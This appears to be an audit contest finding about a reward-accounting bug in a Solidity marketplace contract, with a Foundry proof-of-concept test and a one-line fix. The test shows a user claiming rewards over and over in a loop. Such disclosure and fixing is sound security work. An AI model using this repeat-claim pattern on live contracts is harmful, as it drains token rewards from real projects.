Submission Details
Severity:
`_collectedRewards` calculation is incorrect in function `collectReward()`
Summary
_collectedRewards calculation is incorrect in function collectReward(),
_collectedRewards should accumulate all rewards that have been collected.
Vulnerability Details
function collectReward() external {
require(!martenitsaToken.isProducer(msg.sender), "You are producer and not eligible for a reward!");
uint256 count = martenitsaToken.getCountMartenitsaTokensOwner(msg.sender);
uint256 amountRewards = (count / requiredMartenitsaTokens) - _collectedRewards[msg.sender];
if (amountRewards > 0) {
@> _collectedRewards[msg.sender] = amountRewards;
healthToken.distributeHealthToken(msg.sender, amountRewards);
}
}
_collectedRewards calculation is incorrect in function collectReward(),
_collectedRewards should accumulate all rewards that have been collected.
POC:
function testCalculationIncorrectCollectReward() public eligibleForReward {
vm.startPrank(bob);
marketplace.collectReward();
vm.stopPrank();
assert(healthToken.balanceOf(bob) == 10 ** 18);
//give bob another 3 martenitsaToken
vm.startPrank(chasy);
martenitsaToken.createMartenitsa("bracelet");
martenitsaToken.createMartenitsa("bracelet");
martenitsaToken.createMartenitsa("bracelet");
martenitsaToken.approve(address(marketplace), 3);
martenitsaToken.approve(address(marketplace), 4);
martenitsaToken.approve(address(marketplace), 5);
marketplace.makePresent(bob, 3);
marketplace.makePresent(bob, 4);
marketplace.makePresent(bob, 5);
vm.stopPrank();
vm.prank(bob);
marketplace.collectReward();
assert(healthToken.balanceOf(bob) == 2* 10 ** 18);
//bob can collect reward again and again.....
for(uint256 i=0;i<10;i++){
vm.prank(bob);
marketplace.collectReward();
}
assert(healthToken.balanceOf(bob) == 12* 10 ** 18);
}
add this test function in MartenitsaMarketplace.t.sol,
then run forge test --mt testCalculationIncorrectCollectReward
Impact
High
Tools Used
Foundry
Recommendations
function collectReward() external {
require(!martenitsaToken.isProducer(msg.sender), "You are producer and not eligible for a reward!");
uint256 count = martenitsaToken.getCountMartenitsaTokensOwner(msg.sender);
uint256 amountRewards = (count / requiredMartenitsaTokens) - _collectedRewards[msg.sender];
if (amountRewards > 0) {
- _collectedRewards[msg.sender] = amountRewards;
+ _collectedRewards[msg.sender] += amountRewards;
healthToken.distributeHealthToken(msg.sender, amountRewards);
}
}
Updates
Lead Judging Commences
bube over 1 year ago
Submission Judgement Published Assigned finding tags:
_collectedRewards is not updated correctly
Rewards breakdown
nSLOC
239This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.